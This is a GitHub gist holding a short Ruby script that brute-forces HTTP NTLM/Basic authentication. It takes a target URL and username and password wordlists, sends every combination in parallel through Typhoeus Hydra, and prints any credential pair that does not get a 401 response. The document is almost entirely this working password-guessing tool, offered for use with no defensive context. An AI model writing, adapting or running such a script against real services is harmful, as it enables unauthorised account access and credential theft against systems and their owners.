Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Brute Forces HTTP NTLM Basic Authentication using Typhoeus
#!/usr/bin/env ruby
require 'typhoeus'
target_url = ARGV[0]
usernames = File.read(ARGV[1]).split("\n")
passwords = File.read(ARGV[2]).split("\n")
hydra = Typhoeus::Hydra.new
puts "Starting the brute force..."
usernames.each do |username|
passwords.each do |password|
request = Typhoeus::Request.new(target_url, followlocation: true, userpwd: "#{username}:#{password}")
request.on_complete do |response|
puts "SUCCESS! #{username}:#{password} #{response.code}" unless response.code == 401
end
hydra.queue(request)
end
end
hydra.run
puts 'Done!'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment